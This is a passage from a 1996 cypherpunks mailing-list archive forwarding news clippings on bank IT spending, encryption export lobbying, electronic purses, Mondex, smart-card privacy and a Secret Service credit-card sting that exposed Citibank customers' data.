traditionally havehad Unix environments-such as First Boston and J.P.
Morgan-are looking for greater connectivity. They are implementing
off-the-shelf solutions instead of insisting on proprietary systems,
Wolf adds.

Nowhere is this desire for choice and connectivity more intense than at
Merrill Lynch, the financial services company with the highest annual IT
expenditure.

This month, Merrill Lynch will launch Trusted Global Advisor, a
technology platform for its financial consultants. The system consists
of 25,000 IBM multimedia PCs using the Microsoft Windows NT operating
system and linked by 1,200 servers.

Using the NT platform "allows us to buy our applications rather than
build," says CIO Sorgen. Merrill Lynch still uses Unix for
industrial-type applications such as data-intensive analytical
computation, but NT will become the norm for retail applications, he
adds.

By turning to off-the-shelf applications, Merrill Lynch hopes to cut the
cost of technology consultants. In order to hasten the use of new
technology, the company relied heavily on outside consultants. Indeed,
almost 20% of the company's IT expenditures over the past five years
went to pay for outside help, says Sorgen. Now Merrill Lynch is looking
to widely available solutions and in-house training to sharply reduce
its technology personnel cost.

Keeping Control

Not that the company wants to avoid everything proprietary. Merrill
Lynch is following the lead of financial institutions such as Citibank
in offering its retail customers an online service with a wide range of
uses-from stock quotes and other financial information to direct orders
to financial consultants.

But instead of making the online service available on popular online
networks, Merrill Lynch plans to maintain control over its customers'
data. "You really don't want to allow sensitive data to pass across the
Net without the development of some real security safeguards," says
Sorgen.

Just down the block from Merrill Lynch, American Express is taking a
slightly different tack. It, too, is focusing on technology integration,
but American Express wants to create a global platform that is both easy
to use and scalable.

American Express already has invested heavily in its ExpressNet and is
focusing on developing a World Wide Web site for its small- business
customers. In late July, it announced a joint venture with Microsoft to
develop a travel service on the Internet (IW, Aug. 5, p. 35).

Channel Change

CIO Allan Loren says American Express is focused on two main
goals:reengineering the company and helping to deliver new products.
"We're changing distribution channels," says Loren, emphasizing the use
of the Internet in helping distribute new products and expand the
transactional capabilities of the company.

Nearly half of IT expenditures at American Express is going toward
reengineering and new product development, Loren estimates, and about
40% is being used to maintain its technology operations. The rest is
being used to determine new directions for the company in a highly
charged and competitive business environment.

For other financial services companies, the technology challenge has
been to find expanded use for data and consequently develop a broader
range of products,says Equifax president McGlaughlin. Investment in
technology at Equifax is related to moving away from mass-marketed,
commodity information to more customized information solutions, he says.

The company also is attempting to create more real-time data. Its data
gatherers use notebook computers to record and transmit data, and the
company plans a major investment in parallel processors to handle the
bigger volume of data it hopes to soon generate.

Three years ago, all of Equifax's data was stored in mainframes,
available only to Equifax technical staff. Now, says McGlaughlin, with
the mainframes replaced by servers and networked PCs, nearly two-thirds
of the data is at customer terminals.

"We're much closer to the leading edge now," he says. "New technology
has allowed us to free up our resources and devote more of them to
developing applications rather than storing data."

Too often in the past, technology investment has meant large computers
and proprietary software, resulting in systems that didn't allow
enterprisewide use of technology. The front and back offices remained
separate entities.

Now, with the expanded availability of application software-ranging from
enterprise resource planning to object-oriented databases-it has been
possible to gradually merge the front and back offices and give users
more data and more tools with which to use data.

The result, industry executives say, isn't simply improved productivity
but also sharply reduced costs to the entire enterprise.



Reuters: Wednesday, September 11, 1996

Industry Groups Lobby for More Encryption Exports

By Aaron Pressman

A broad coalition of corporations went to Capitol Hill on Tuesday to
lobby in favor of relaxed export restrictions on computer encoding
technology.

On Thursday, the Senate Commerce Committee will mark-up the Promotion of
Commerce Online in the Digital Era Act of 1996 known as Pro-CODE, a bill
that would abolish most export restrictions.

Under a Cold War-era munitions statute, only weak encryption programs
created in the United States can be sold abroad, although domestic use
of encryption is not regulated.

Companies in the high-tech industry argued they are losing business to
foreign competitors who are not bound by U.S. export restrictions. And
multinational companies in other industries said the the restrictions
hamper their ability to conduct business overseas.

"We are at a competitive disadvantage vis-a-vis our foreign competitors
and that is an unacceptable situation," Gregory Garcia, director of
international trade affairs for the American Electronics Association,
said at a press briefing here.

The Pro-Code bill, sponsored by Republican Senator Conrad Burns of
Montana, Democratic Senator Pat Leahy of Vermont and others, has
bipartisan support in the Commerce Committee. "We support the Burns bill
because it does enable companies to utilize encryption technology
securely which is vital if we're going to compete in a very tough global
marketplace," Victor Parra, president of the Electronic Messaging
Association, said.

The association represents companies that rely on electronic
communications, including Exxon Corp , Citicorp and Boeing, Parra said.

Encryption programs use mathematical formulas to scramble information
and render it unreadable without a password or software "key."

Earlier this week, Senator James Exon, the Nebraska Democrat, came out
against the current bill in a letter to Commerce Committee chairman Sen
Larry Pressler. Exon will likely offer amendments at the mark-up, an
aide to the senator said.

The Clinton administration opposes the Pro-CODE bill, arguing that
export of encryption technology would hamper law enforcement and
intelligence gathering operatiobns.

The House Judiciary Committee will hold a hearing on a similiar measure
on September 25.



Financial Times: Thursday, September 12, 1996

Japan on the Fast Track for the Electronic Purse

By William Dawkins

LONDON-- Japan yesterday belatedly joined the international race for a
cashless society, when Nippon Telegraph and Telephone, the
telecommunications giant, unveiled what it claims will be a secure yet
confidential electronic purse that could be used by any bank account
holder. The electronic money system, developed with the help of a
think-tank attached to the Japanese central bank, aims to provide
consumers with a "smart" card which would be used to buy goods and
services in shops, vending machines or over the Internet and could be
topped up by being plugged into a cash dispenser or telephone. In common
with some other systems, the Japanese version would also give customers
personal digital signatures, to stem fraud.

Smart cards contain computer microchips - rather than the magnetic strip
that has become the industry standard - which enable them to be used not
only to carry out financial transactions but also to store data.

The NTT card is similar to other electronic purses, such as the one
being tested by Mondex, a UK-led global consortium of 17 banks, which
has run a trial of its card in in Britain for more than a year.

The market for electronic purses is being contested by global credit and
charge card organisations Visa, MasterCard and Europay, which are all
holding trials of their own cards. What NTT claims is unique about its
plan is that it envisages the establishment of a digital central bank,
which would issue electronic cash on the cards to customers in
co-operation with the retail banks where they hold accounts. The aim,
said Mr Hiroshi Yasuda, an NTT executive, is to enable participating
banks to issue compatible electronic purses, thus avoiding the
competition over technical standards which has dogged other systems.

Mondex, for example, does not comply with technical standards for chip
cards set by Europay, MasterCard and Visa. Some critics of Mondex say it
will falter internationally because of this non-compliance. However,
Mondex says standards are important only in that card-users and
retailers do not want to have multiple point-of-sale terminals to accept
the cards.

Understandably, NTT wishes to retain technical mastery of the system,
which is why it has applied for a Japanese patent for the computer
software that would enable the digital central bank and private sector
banks to operate together. Electronic purses operators across the world
say that it will take at least a decade for consumers to make the switch
in large numbers. The change is likely to take longer in Japan, where
consumers and companies favour paper money.

Most small and medium-sized companies still pay suppliers in paper,
delivered in person. Banks refuse to set up standing orders. Cash is
instead sent by post. Credit and charge cards are not widely accepted.
The average citizen's wallet bulges with cash, not cards.

The NTT proposal is the strongest of several rival and incompatible
Japanese experiments, carried out by the Ministry of International Trade
and Industry and the Ministry of Posts and Telecommunications. NTT will
ask the ministries to adopt its system, to pave the way for a single
standard cashless nation. William Dawkins

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 15:12:15 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <7VJFuD100w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Los Angeles Times: Monday, August 26, 1996

Credit Sting Involves Hacker And Citibank Cardholders

By JIM NEWTON, TIMES STAFF WRITER

When U.S. Secret Service agents set a trap for a young computer operator
who had expressed an interest in stealing credit information, they
baited it well: with real credit card numbers from real customers.

The young man, Ari Burton of Las Vegas, went for it, was arrested and
was charged with possession of stolen credit information--charges to
which he ultimately pleaded guilty. That ended the case against Burton,
but the cardholders' information did not stay secret with the Secret
Service. Detailed credit histories of 35 Citibank cardholders, none of
whom gave their permission for their files to be accessed, ended up with
the defendant, his lawyers and anyone else who got a copy of the case
file.

Included in it: names, addresses, home phone numbers, Social Security
numbers, credit card numbers, available credit lines and outstanding
balances--more than enough for anyone to run up huge tabs on
unsuspecting customers.

The cardholders were never warned that their information had been used
in a sting, or that it had subsequently been shared with the defendant
and others. In fact, a few of the cardholders only learned of the
disclosure when the defendant's father wrote asking whether they had
authorized the release of the information. Others found out just last
week, three years after the information was first released, when
contacted by The Times.

Told of their unwitting involvement in a federal sting, many were
furious.

"I'm upset, I'm real upset," said Joe Becker of Costa Mesa. "I want to
know how this happened."

"I never authorized anything like that," said Sarah DiBoise, who lives
in Atherton. "I am certainly bothered by it."

And Sam Zadeh, who lives in New York, deplored what he called the "bank
and law enforcement agency invading our privacy."

The same revelations that left cardholders smoldering also raised
troubling questions about the conduct of the government and of the bank
that released private information to the Secret Service. Some of those
questions ripple into delicate areas of criminal law--topics such as the
right of defendants to evaluate evidence against them and the right of
uninvolved citizens to maintain their privacy while federal agents try
to corral bad guys.

Why, lawyers, cardholders and others asked, would the Secret Service use
real cardholder information for sting operations? And even if, for legal
reasons, it feels compelled to use actual credit histories, why not seek
permission from cardholders first?

Finally there is this question: How many cardholders nationally are
exposed to disclosure of their credit information through government
operations? Authorities in some other parts of the country say they do
not use real credit information, and Citibank stresses that the Burton
case was an aberration. But investigators and prosecutors in Las Vegas
said the techniques used to nab Ari Burton are employed in other
instances.

In fact, Secret Service agents in Las Vegas say the use of real credit
information is forced upon them by federal law requiring authorities to
demonstrate that a suspect actually possessed something illegal in order
to win in court.

"In something of this nature, the crime is the illegal obtaining of what
is called the access device," said Jerry Wyatt, assistant special agent
in charge of the Secret Service office in Las Vegas. "Unless the access
device is a real number, it's just a number."

Following that theory, some authorities argued that if the Secret
Service had supplied Burton with fake credit card information, Burton
could not have been found guilty of attempting to steal real credit card
histories.

But that reading of the law is hotly contested by experienced lawyers.
Although it is a violation of federal law to have unauthorized
possession of an access device--another name for a credit card
number--it also is against the law to attempt to possess such a device,
even if that attempt turns out not to be successful.

Legal experts said agents could make up fictitious customers and
generate false credit histories, then use that information in sting
operations. Even without a handoff of real credit information,
prosecutors still could charge the objects of the stings with attempting
to steal credit card numbers, an approach that might slightly complicate
criminal cases but that would protect cardholders.

Wyatt said he was not familiar enough with the facts of the Burton case
to know why that approach was not adopted. Nor could he say how many
cases each year involve the knowing transfer of actual credit
information from the government to criminal suspects--only that such
cases are not unusual.

At the U.S. attorney's office in Las Vegas, the chief of that office's
criminal division agreed that other tactics might have minimized the
risk to cardholders in the Burton case, but he said the Las

Vegas office typically uses real credit card numbers of actual
cardholders in luring suspects such as Burton.

"We're sensitive to disclosing too much personal information," said John
Ham of the U.S. attorney's office. "But whenever we charge credit card
cases, we include names and numbers."

As for its role, Citibank acknowledged releasing the files to the
government but defended its actions by saying it meant no harm and by
stressing that its customers' privacy is its highest priority.

"We would never do anything to jeopardize our customers," said Maria
Mendler, a spokeswoman for the bank, which has a reputation for vigorous
protection of its cardholders' privacy. She acknowledged that real
information was supplied in the Burton case, but she said the bank did
not intend for that information ever to surface in a court file or
otherwise become available to the defendant and others.

In 1993, the bank also defended its actions in a letter to a lawyer by
noting that while information had been released, it had not been done to
hurt anyone. "We submit that the actions as alleged do not include the
requisite element of an intention to do harm to those customers whose
information was disclosed," an associate general counsel for Citibank
wrote at the time.

Those explanations hold little sway with Citibank customers, however,
many of whom complained that if their personal credit histories were
going to be used in a sting operation, they at least deserved to be
notified so that they could apply for new card numbers once the
operation was over.

Instead, sensitive information about them and their credit has been
kicking around a court file for more than three years--available to,
among others, Burton, a man who has admitted that he tried to steal
credit information. There is no evidence that Burton or anyone else used
the card information gathered in that case to ring up bills, but that,
too, is little comfort to the cardholders.

"Financial information is private, and I have a right to privacy," said
Becker, one of those whose credit information was used by the Secret
Service. "I'm worried about how this information might be used now that
it's out there."

Experienced defense and civil rights lawyers, who are used to analyzing
government conduct and subjecting it to harsh scrutiny, said they were
taken aback by the actions of the Secret Service and Citibank in the
Burton case.

"I would think these people could sue for invasion of privacy," Century
City defense lawyer Harland W. Braun said of the cardholders.

Paul Hoffman, a Los Angeles civil rights lawyer, said he too was
surprised by the use of private information in a sting.

"It does seem amazing to me," he said. "These people have rights, too."

Legal experts with both defense and prosecution backgrounds acknowledged
that problems might have confronted the Secret Service had it tried to
avoid offending customers by fabricating card numbers or inventing fake
credit histories. But they said those problems probably could have been
overcome, and added that in any event, they did not pose enough of an
obstacle to justify accessing credit information without permission.

"The answer to that is you get real people who are willing to have their
credit cards used that way," said Hoffman. "If you're doing a sting in a
house, it doesn't mean you go into a neighborhood and take a house. Why
should this be different?"

Complicating the issue still further is a decision by the prosecutor in
the case. Once the Secret Service and Citibank had used real credit
histories to bait the trap for the sting, the U.S. attorney in Las Vegas
was presented with a case in which the evidence against the defendant
involved personal information whose disclosure might harm innocent
citizens.

That type of situation can pose a difficult dilemma for a prosecutor:
Federal rules require that prosecutors share evidence with their defense
counterparts so that defendants know what they might face at trial, and
failing to do so can allow suspects to go free. On the other hand,
disclosing the information might put other people at risk.

In general, careful prosecutors tend to err on the side of providing
information to the defense even if it may create hazards for others.

In the Burton case, however, some experts argue that the privacy rights
of the cardholders should have outweighed the defendant's right to
confront the specific identifying information; an edited list of
cardholder information should have sufficed in a case such as this one,
they said.

The solution, according to those experts, would have been for
prosecutors to ask the judge to impose a protective order that would
have shielded the personal, private information from either the defense
lawyer or from the defendant himself.

But others maintain that Burton's lawyers were entitled to the
information because it was evidence against Burton, and therefore
evidence that his lawyers had a right to assess and consider in deciding
their legal strategy.

Ham, the chief of the Las Vegas office's criminal division, echoed that
view, saying his office had no choice.

"We have to provide documents that support the charges," he said. If
prosecutors had not done so, he added, a judge undoubtedly would have
forced them to. Ham said no protective order was sought to keep the
information from being shared with people other than the defense lawyer.

The prosecutor, said noted Los Angeles defense lawyer Donald Re,
"probably had the obligation to provide the material in discovery." Re
added, however, that a protective order might have been tailored to
allow Burton's lawyers to review the material on the condition that they
not share it with anyone else, including their client.

Because there was no such order, Burton effectively received the same
information in discovery that he had sought illegally. Within a month of
being arrested, the same government that was charging him with a crime
provided him with the list of cardholders and their personal
information.

"They handed it right back to me," Burton said in an interview.

At the same time, Re and others stressed that the prosecutor's decision
was a close call and difficult to second-guess. Far more troubling, they
said, were the actions that led to it: the bank's disclosure of the
material and the Secret Service's decision to hand it over to a suspect.

And given the statements by investigators and prosecutors that the
techniques used in the Burton case are widely practiced in other
investigations, many experts warned that ill-advised government
practices may be putting cardholders across the country at risk.

"There are a lot of situations where they create a scenario like this
where you want to show actual possession, not just an attempt," said Re.
"But in those situations, you get consent from somebody. You have a
security officer who sets up an account, and you use that account number
in the sting. Then there's no harm, no foul.

"But you don't give out real information," Re added. "That's just
crazy."


USA Today: Wednesday, August 28, 1996

Citibank Tightens Rules on Disclosure to Law Enforcement

By Jeff Mangum

Stung by a sting that nabbed a Las Vegas man for possession of stolen
credit information, Citibank says it has changed how it works with law
enforcement agencies.

Citibank agreed in 1993 to give the U.S. Secret Service credit card
information on 35 customers, without their knowledge, to help catch a
man who eventually pleaded guilty. Customers' names, addresses, home
phone numbers, Social Security numbers, credit card numbers, available
credit lines and outstanding balances ``ended up with the defendant, his
lawyers and anyone else who got a copy of the case file,'' the Los
Angeles Times reported Monday.

``Citibank trusted that the criminal justice system would keep this
information safe and confidential,'' the bank said Tuesday. ``As it
turned out, that was a mistake.''

Citibank says a relative of the defendant subsequently contacted the
affected customers, asking them to join a class-action lawsuit against
the bank. That, spokesman Mark Rodgers says, prompted Citibank to
contact the customers and change its policy in 1993. ``Were we to
consent to a similar operation (now), for example, we would only do so
with the express consent of that customer,'' Citibank said Tuesday.

Federal law generally prohibits disclosure of financial records. But
there are exceptions. ``The general rule of thumb is there has to be a
subpoena or a person's consent,'' says Mitch Montagna, a spokesman for
AT&T;Universal Card. The American Bankers Association says ``99.9% of
the time, customer information is safe and secure.''


Denver Post: Tuesday, September 10, 1996

Editorial

U.S. Invades Privacy in Nevada Credit-Card Sting

Americans who say they worry about invasions of their privacy have a new
reason to fret: In a recent case, the federal government and a major
bank willingly gave a suspected crook the credit card numbers and
personal histories of citizens -- without their permission or knowledge.

The breach of privacy in this Las Vegas, Nev., case was egregious and
outrageous. The Clinton administration should reprimand the agents
involved, and Congress should amend the laws so that such an affront to
citizens' rights never reoccurs.

In the case, U.S. Secret Service agents wanted to snare a computer
operator who had expressed interest in illegally obtaining credit-card
information. They asked Citibank for the names, addresses, Social
Security numbers and other credit information on some of the bank's card
holders. Citibank complied with the request - but never got the card
holders' permission to divulge such personal information, according to a
story in the Los Angeles Times. In other words, law enforcement agents
handed a suspected credit swindler the very information he would need to
carry out a crime.

The suspect ultimately pleaded guilty to some of the charges.

Many of the card holders heard that their personal records were used to
bait a credit-card sting only when the defendant's father contacted
them. Others learned about the episode through a newspaper reporter who
was covering the case.

In theory, there are laws to protect consumers from people prying into
their credit histories without their permission. Obviously, these
statutes aren't nearly strong enough.


American Banker: Monday, September 16, 1996

FUTUREBANKING

Mondex, Moving Fast, Sees Long Trek To a Worldwide Cash Alternative

By JEFFREY KUTLER

Exactly a year passed between the start of the Mondex trial in the
southwest England town of Swindon and the creation of Mondex
International, the banking consortium that hopes to use the smart card
system as the basis for a global alternative to cash.

That was fast according to the calendar. It was also an eternity.

During those 12 months, National Westminster Bank, the new payment
technology's inventor and champion, rode a roller coaster between self-
congratulation and a skeptical press, between the celebration of an
unprecedented accomplishment and a storm of criticism from within its
own industry.

Even with the formation July 18 of Mondex International, enthusiastic
backing from banking powers as diverse as Wells Fargo Bank and Hongkong
& Shanghai Banking Corp., and the current cloning of Swindon in the
Canadian city of Guelph -- it relates locationally to Toronto as Swindon
does to London - the Mondex eternity continues.

The emotional pendulum still swings at Natwest Group headquarters in
London. And emanating from Natwest and from within the Mondex project is
a mix of messages that underscores how truly groundbreaking is their
attempt.

Win or lose, whether or not they are understood or praised by their
peers, the founders of the Mondex project have risen above the almost
weekly cycles of technological change and quarterly pressures on
earnings with a longer-term perspective antithetical to the traditional
ways of bankers and the banking industry.

"Natwest recognizes that Man does not live by short-term profits alone,"
group chief financial officer Richard K. Goeltz said in a recent
interview with American Banker. "There are things we have to bequeath to
our successors."

Mr. Goeltz -- who moved to New York this month as chief financial
officer of American Express Co. -- and others close to Mondex want the
world to recognize how far they have come in a year.

But the Mondex promoters are quick to point out that it is actually Year
6 since Natwest began to fund them. Today they look at a 10- or 15-year
horizon.

(Natwest will recover most if not all its development cost by issuing
about $150 million of stock in Mondex International. The bank expects to
collect further royalties as the system rolls out. Partner bankers do
not begrudge Natwest its return for risk taking.)

One gets the sense that Natwest's leaders were so well primed for the
long haul that it would take more than a few technical glitches and
negative newspaper stories to get their goat. Mr. Goeltz dismissed the
sniping from more tradition-bound competitors as "slings and arrows"
that never hit their mark.

Mr. Goeltz and other insiders knew, long before the Mondex International
membership roster became public, that the concept was attracting
interest. "Broad-scale cooperation" was a prerequisite, written into
Natwest's business plan, and 16 other "global founders" who came forward
July 18 found the case compelling enough to want to join in the
marathon.

"This is a process of change management - it's not like flicking a
switch," said Roy S. Pratt, deputy chief general manager of Mondex UK
Ltd., the British franchise co-owned by Natwest and Midland Bank Ltd.

"Our job is not to say, 'This is how it will be.' It is about trends and
responsiveness. To say anything is cast in stone at this point would be
presumptuous."

Mr. Pratt, 49, spent 31 years at Midland Bank before being "seconded" to

Mondex UK in 1994. His banking jobs were in treasury, asset/liability,
and portfolio management. He said his nontechnological background
enabled him to see the complexity of the phenomenon, to confront
necessary questions about the known and unknown quantities of a
reinvented payment system.

"People always want to ask about take-up (acceptance) rates, how fast
this will happen, but I am reluctant to make blanket statements," Mr.
Pratt said. "Mondex will mean different things to different people. It
will not be the same at Exeter University (where it is being introduced
this fall) as it is in Swindon.

"There is not one proposition or growth rate. What is a critical mass
for one segment will be different in another. A carpark will not be the
same as a bus. You might call each a micro-Mondex economy.

"This is a change process that will be based on value exchange on a
just-in-time basis," Mr. Pratt continued. "It is not a product like a
loan or deposit package, or even a payment mechanism. It is not
mono-dimensional.

"And it's not just an issue for bankers. We respect the integrity of the
payments process, but we also have a responsibility to society."

Such words are hardly bankerly.

To be sure, Mondex has rigorous underpinnings. The bankers' thought
processes are logical. The strategic plans passed muster with "some of
the most sophisticated, hard-nosed bankers in the world," Mr. Goeltz
said.

"Mondex does have tremendous social implications, not least in terms of
what it can do for welfare payments and pensions," Mr. Goeltz said
before his recent departure for American Express. By automating cash "it
reduces friction in the economy.

"But the implications for society were not the motivation for Mondex. It
was to serve customers better and generate a return for shareholders.

"What's interesting about Mondex was not the technology," Mr. Goeltz
went on. "The technology was a facilitator. This is one of the few
products I've seen in which all three participants in the value chain --
banks, retailers, and customers -- benefit."

The enthusiasm carries over to outsiders - even some who have been
lumped among the critics - to a point.

"The richness, the robustness of the technology, is fantastic," said H.
Eugene Lockhart, president and chief executive officer of MasterCard
International. (MasterCard held negotiations with Natwest to buy into or
participate in Mondex, but at the same time its European affiliate,
Europay International, was developing the competitive Clip electronic
purse system.)

For more than two years, Mr. Lockhart has insisted on seeing smart
cards' "business case," and even as MasterCard launches experiments
around the world he is still not completely satisfied.

"Let's assume there is a business case," he said. "The opportunity is
that we have this new technology platform that can do a lot of things,
stored value being only the first manifestation. "But there is a big
problem: How on earth do you grow that system in millions of other cases
just like Swindon?"

Swindon, for now, is "the case."

Mondex UK's overly optimistic projection of 40,000 cardholders in the
city of 190,000 people set off the bad press. In reality, the 10,000
that signed up within 12 months weren't bad news at all. That's almost
25% of the combined Natwest-Midland customer base in the area.

Mondex said its surveys showed 66% of the cardholders said they
preferred Mondex to cash. Average card loads were the equivalent of $35
to $45, and the majority of transactions were under $7.50.

Perhaps more to the point, it is hard to find a storefront, public
phone, or any type of payment device in the commercial center of Swindon
that does not accept Mondex. The banks signed 600 merchants, double the
number accepting MasterCard and Visa, which stands to reason for a cash
replacement.

"You can actually go cashless," said Mark Gordon, Mondex International's
head of marketing. "It's not a big deal when you present Mondex at the
tills."

While Mondex has been selective in its data disclosures -- no one denies
that its transactions are a small percentage of the Swindon total -- Mr.
Gordon and his team have been more than hospitable in letting the world
come view Mondex. Banker delegations are commonplace, often gathering at
the "Mondex Store" in the town center before setting out to observe and
test merchant acceptance.

Hardly a day goes by without the visit of a television crew. Many come
from Asia, where Mr. Gordon believes "Mondex will really fly." (A Hong
Kong pilot is set for late this year, and smart cards of various kinds
are already prevalent in Singapore, Taiwan, and elsewhere in the
region.) "They see this as a city of the future," he said, "like
something out of 'Blade Runner.'"

The Mondex staff tries to keep the visits unobtrusive, but some of the
merchants were willing to pay the price of unanticipated stardom.

"Our town center store is small," said Bob Upshall, manager of the
Sainsbury supermarket, part of one of Britain's biggest chains. "Having
Mondex raised our profile and provided a morale boost."

At the corporate level, Sainsbury was eager to participate in Mondex
because "it didn't want to be left behind." So the smaller,
convenience-oriented Swindon outlet, which otherwise might have relied
for years on older computers and point of sale equipment, got an upgrade
on a par with many "superstores," and Mr. Upshall said, "My staff loved
it. A positive staff is a plus for customer take-up."

Sainsbury, a Midland Bank customer, invested 45 minutes per cashier in
Mondex training and found the system was so easy to grasp that it didn't
have to deploy, as anticipated, demonstrators in the checkout lanes.

Mondex volumes were running at less than 0.5% of sales at the three
Swindon stores -- slightly lower in the town center location than at the
larger branches on the outskirts of town. Mr. Upshall said an incentive
offer in May and June of a five-pound voucher (about $7.50) for every
50- pound ($75) shopping trip brought in transactions well above the
average ticket of five pounds in-town and 30 pounds ($45) elsewhere.

"Whether smart cards will be in Mondex or other forms, they are here to
stay," Mr. Upshall said. He gauged customer reaction as "very positive,"
though mainly among early adopters. He himself likes Mondex as a
consumer -- "I use it in the canteen all the time" -- and as a merchant,
because it streamlines the cash-handling tasks that require two to three
full-time positions in the supermarket's back office.

Nearby in McElroy's, a local department store, Vince Ayris accepts and
encourages Mondex payments at his shoe repair and key-making stand. Mr.
Ayris has been in the business 17 years, is a well-known man about town,
and so strongly believes in Mondex that he essentially sold it to the
local rugby club, where "we use it quite a lot. I find I'm more careful
about spending money (with Mondex) than with cash, and it's easier than
small change."

Mr. Ayris admitted to being "a bit skeptical at first," but he has
become so strong a booster that Mr. Gordon felt he had to deny that Mr.
Ayris is in Mondex's employ.

"I don't give money away to a bank like I do with a MasterCard or Visa
discount," the merchant said. "There is no problem with fraud or
counterfeit.

"I have more over-ring errors on the till than on Mondex terminals.
Every transaction is documented so disputes are more easily resolved"
than with cash.

And because the Mondex terminal is smaller than a cash register, "I have
more room for selling product."

Mondex is also proving itself at a multiplex movie complex, part of the
MGM chain that Virgin Enterprises recently acquired. John Keil, the
manager, said he "needed no convincing" to accept Mondex at every point
of sale. "We saw the benefit immediately. Any way at all to take cash
out of the system, the better.

"The bigger the business, the more problem cash is," Mr. Keil went on.
"Any major company sees the benefits in the technology."

Like the supermarket, the MGM outlet easily won staff support. "Most of
them are into gadgetry," Mr. Keil said.

It also encouraged sales by cutting Mondex users' ticket price to about
$4.90 from $6.80. The transactions are still a small portion of the 30%
of in-person box-office sales done on plastic cards. (Another 30% are
advance sales by phone; Mondex has not yet been accepted that way.) Mr.
Keil said he is looking forward to having "one box" that can accept all
cards. Even so, he said Mondex was "very flexible, requiring no change
whatsoever to our system. It was slotted right in ... They made their
system fit ours."

"I think the system will take off eventually," Mr. Keil said. His only
regret is that because he doesn't live in Swindon, he can't use Mondex
more than he does.

It is as if Mondex has succeeded at recruiting its merchants as change
agents. Time will tell if they are still on board when Mondex begins
costing them something.

"The chip brings a fundamental change," said Mr. Pratt of Mondex UK.
"You feel as if you are shaping the future.

"When the market begins using it to create its own needs and to solve
its own problems, that's when the real thrill will come -- and a surge
in usage."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 15:53:40 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <F1JFuD101w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


AP Online: Sunday, September 15, 1996

Card Raises Privacy Issues

By PATRICIA LAMIELL

Big Brother is not watching. Or is he?

Fears resembling those of the omniscient machine that spies on people in
their homes in George Orwell's novel, ''1984,'' have found their way
into a new technology entering the marketplace -- smart cards.

These credit cards embedded with computer chips can store information
from shoe size to credit history. But critics claim these cards will be
used to compile dossiers on the people who use them.

And now it's up to the Smart Card Forum, a family of companies driving
development of smart card technology, to convince the public that Big
Brother isn't watching, for smart cards are protected and confidential.

''There's a huge amount of misunderstanding, and that creates a huge
amount of fear, about whether these products are going to decrease
people's privacy or otherwise leave them unprotected,'' said John Burke,
the forum's attorney and a partner at the law firm of Foley, Hoag &
Eliot in Washington, D.C.

Starting Monday in San Francisco, members of the Smart Card Forum will
meet to discuss the latest technology and marketing programs necessary
to put a smart card in every household. In many ways, smart cards
resemble credit and debit cards that the market has grown accustomed to
using. With a simple swipe, they too can substitute cash when buying
everything from subway tokens to clothing and the purchase price is
electronically deducted from the card using a special machine.

But the smart card takes the technology further, embedding a computer
chip into the card. that gives it much more memory and enables it to do
simple math and process information, like keeping a bank balance or
tracking frequent flier miles.

The huge potential scope of the smart card has prompted some concerns
about the privacy rights of users. By tracking small purchases,
telephone and transportation records, they can document a person's
everyday movements.

That information could be useful to everyone from employers and family
members to law enforcement officials and banks. Marketers might be very
interested in records of purchases made with smart cards.

But privacy experts question whether third parties should gain access to
see such information.

The American Civil Liberties Union of New Jersey is fighting a state
proposal to encode fingerprints on smart card drivers licenses on the
premise that it would treat as criminals people who are not suspected of
a crime.

''We also oppose the requirement that other data be included'' on New
Jersey drivers licenses, said David Rocah, an ACLU staff attorney in
Newark, ''unless precautions are made to insure that third parties will
not have access to that data.''

Others, however, counter the questions of privacy, claiming that owners
can control what information goes onto them and with whom it is shared.
They also point out that the information is electronically scrambled, or
''encrypted, '' making it very difficult to steal.

The Smart Card Forum is working to create privacy guidelines that can
keep pace with the fast-developing industry. Federal regulators, such as
the Office of the Comptroller of the Currency, the Federal Reserve and
the Federal Deposit Insurance Corp., are all considering whether and how
to regulate smart cards.

Smart cards are a huge business for companies like Texas Instruments
Inc. and Motorola Inc., which make the chip. They could also be a boon
for banks and other financial institutions that issue the cards for a
fee, and for payments-systems networks like Visa and MasterCard, which
earn a percentage of each transaction.

''This is a huge, huge market,'' said Peter Hill, executive vice
president for technology at Visa International, one of the 225 corporate
members of the forum. ''Cash transactions world-wide total about $8
trillion a year, of which 80 percent are for $10 or less.''

A number of big banks have run pilot programs to test consumers'
acceptance of the cards. Some have teamed up with Visa and MasterCard to
do market tests in Swindon, England, Canberra, Australia, and at the
1996 Summer Olympic Games in Atlanta. A test is planned by MasterCard,
Visa, Chase Manhattan Corp. and Citicorp, in New York's Upper West Side
later this year.

So far the pilot projects, which have put about 50,000 smart cards in
circulation worldwide, have had mixed results. Many worry consumers will
not incorporate the cards into purchases they now make with cash, and
that has left merchants wary about the cards also.

To move beyond the arena of small purchases, members of the Smart Card
Forum are developing technology to allow people to use home computers to
pay for Internet purchases with these cards, and to download cash onto a
smart card. Personal-computer makers have begun including chip readers
in PCs for these purposes.

Also in development are scores of non-financial applications, such as
keeping drivers license and medical information, transferring government
welfare or medical benefits, and making airline and hotel reservations.

To Diane Wetherington, MasterCard's senior vice president for smart
cards, the Forum's biggest task is not the social and legal issues
surrounding the smart card, but getting consumers to use it for any and
all financial transactions down to the 10-year-old's weekly allowance
and merchants to accept it.

''The technology works, the product works,'' she said. ''Now it is up to
the marketing associations and companies to really try to create global
products from these.''


American Banker: Monday, September 16, 1996

FUTUREBANKING

SET a Big Win for the Card Associations

By JEFFREY KUTLER

Whether for superstitious reasons or just to avoid the inevitable
groans, experts in data security were long reluctant to use a certain,
pertinent pun. But now it can be officially uttered: SET is set.

Secure Electronic Transactions, the Internet payment protocol hashed out
